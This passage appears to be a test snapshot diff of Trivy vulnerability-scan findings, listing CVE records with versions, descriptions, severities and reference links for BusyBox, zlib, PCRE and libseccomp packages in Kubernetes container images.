"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42382", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42382", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42383", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42383", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 4) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42383", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42383", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - }, - { - "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://avd.aquasec.com/nvd/cve-2017-7245", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7245", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42384", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42384", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42384", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the handle_special()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42384", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42384", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7245", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7246", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", + "references": [ + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7246", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7246", + ], + }, + "category": "Vulnerability", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in PCRE 8.40 allows remote attackers to cause a denial of service (WRITE of size 268) or possibly have unspecified other impact via a crafted file.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "pcre: stack-based buffer overflow write in pcre32_copy_substring", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42384", + "value": "https://avd.aquasec.com/nvd/cve-2017-7246", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.securityfocus.com/bid/97067", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/errata/RHSA-2018:2486", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://access.redhat.com/security/cve/CVE-2017-7246", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42384", + "value": "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-7246", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://security.gentoo.org/glsa/201710-25", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42384", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-7246", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42385", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-20838", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42385", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://access.redhat.com/security/cve/CVE-2019-20838", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2019-20838.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2019-20838", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libpcre in PCRE before 8.43 allows a subject buffer over-read in JIT when UTF is disabled, and \\X or \\R has more than one fixed quantifier, a related issue to CVE-2019-20454.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate()", + "name": "pcre: Buffer over-read in JIT when UTF is disabled and \\X or \\R has fixed quantifier greater than 1", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42385", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42385", - }, - { - "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://avd.aquasec.com/nvd/cve-2019-20838", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42385", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://access.redhat.com/security/cve/CVE-2019-20838", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42385", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42385", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42386", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42386", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42386", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the nvalloc()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42386", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42386", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://linux.oracle.com/cve/CVE-2019-20838.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42386", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20838", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42386", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-20838", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42386", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r22", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-28391", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-9893", + "installedVersion": "2.3.3-4", + "packageName": "libseccomp2", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-28391", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", - "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", - "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", - "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", - "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", - "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", + "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", + "https://access.redhat.com/errata/RHSA-2019:3624", + "https://access.redhat.com/security/cve/CVE-2019-9893", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", + "https://github.com/seccomp/libseccomp/issues/139", + "https://linux.oracle.com/cve/CVE-2019-9893.html", + "https://linux.oracle.com/errata/ELSA-2019-3624.html", + "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", + "https://seclists.org/oss-sec/2019/q1/179", + "https://security.gentoo.org/glsa/201904-18", + "https://ubuntu.com/security/notices/USN-4001-1", + "https://ubuntu.com/security/notices/USN-4001-2", + "https://usn.ubuntu.com/4001-1/", + "https://usn.ubuntu.com/4001-2/", + "https://www.cve.org/CVERecord?id=CVE-2019-9893", + "https://www.openwall.com/lists/oss-security/2019/03/15/1", ], }, "category": "Vulnerability", - "description": "BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libseccomp before 2.4.0 did not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE), which might able to lead to bypassing seccomp filters and potential privilege escalations.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: remote attackers may execute arbitrary code if netstat is used", + "name": "libseccomp: incorrect generation of syscall filters in libseccomp", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-28391", + "value": "https://avd.aquasec.com/nvd/cve-2019-9893", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-28391", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00022.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28391", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00027.html", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0001-libbb-sockaddr2str-ensure-only-printable-characters-.patch", + "value": "http://www.paul-moore.com/blog/d/2019/03/libseccomp_v240.html", }, { "type": "URL", - "value": "https://git.alpinelinux.org/aports/plain/main/busybox/0002-nslookup-sanitize-all-printed-strings-with-printable.patch", + "value": "https://access.redhat.com/errata/RHSA-2019:3624", }, { "type": "URL", - "value": "https://gitlab.alpinelinux.org/alpine/aports/-/issues/13661", + "value": "https://access.redhat.com/security/cve/CVE-2019-9893", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-28391", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9893", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-28391", + "value": "https://github.com/seccomp/libseccomp/issues/139", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42374", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42374", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42374", - ], - }, - "category": "Vulnerability", - "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42374", + "value": "https://linux.oracle.com/cve/CVE-2019-9893.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42374", + "value": "https://linux.oracle.com/errata/ELSA-2019-3624.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9893", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "value": "https://seclists.org/oss-sec/2019/q1/179", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://security.gentoo.org/glsa/201904-18", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://ubuntu.com/security/notices/USN-4001-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://ubuntu.com/security/notices/USN-4001-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "value": "https://usn.ubuntu.com/4001-1/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://usn.ubuntu.com/4001-2/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-9893", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "value": "https://www.openwall.com/lists/oss-security/2019/03/15/1", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.2.12-r2", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2022-37434", - "installedVersion": "1.2.11-r3", - "packageName": "zlib", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36084", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/37", - "http://seclists.org/fulldisclosure/2022/Oct/38", - "http://seclists.org/fulldisclosure/2022/Oct/41", - "http://seclists.org/fulldisclosure/2022/Oct/42", - "http://www.openwall.com/lists/oss-security/2022/08/05/2", - "http://www.openwall.com/lists/oss-security/2022/08/09/1", - 